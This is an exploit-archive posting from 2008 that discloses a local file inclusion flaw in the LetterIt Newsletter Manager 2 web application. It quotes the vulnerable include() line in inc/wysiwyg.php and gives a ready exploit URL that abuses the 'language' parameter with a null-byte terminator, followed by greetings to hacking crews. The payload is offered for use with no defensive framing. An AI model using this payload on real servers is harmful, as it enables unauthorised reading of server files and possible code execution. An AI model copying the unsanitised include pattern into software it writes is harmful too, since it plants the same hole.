[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : LetterIt 2 (language) Local File Inclusion Vulnerability
# Published : 2008-07-31
# Author : NoGe
# Previous Title : Coppermine Photo Gallery <= 1.4.18 LFI / Remote Code Execution Exploit
# Next Title : HIOX Random Ad 1.3 (hioxRandomAd.php hm) RFI Vulnerability
====================================================================
[o] LetterIt 2 Local File Inclusion Vulnerability
Software : LetterIt Newsletter Manager version 2
Vendor : http://www.letterit.de/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
====================================================================
[o] Vulnerable file
inc/wysiwyg.php
include("../language/".$_GET['language'].".php");
[o] Exploit
http://localhost/[path]/inc/wysiwyg.php?language=[LFI]%00
====================================================================
[o] Greetz
supported by irc.nob0dy.net
MainHack BrotherHood [ www.mainhack.com ]
VOP Crew [ Vaksin13 OoN_BoY Paman ]
H312Y yooogy mousekill }^-^{ martfella
skulmatic olibekas ulga Cungkee nyubi k1tk4t str0ke
====================================================================
# www.Syue.com [2008-07-31]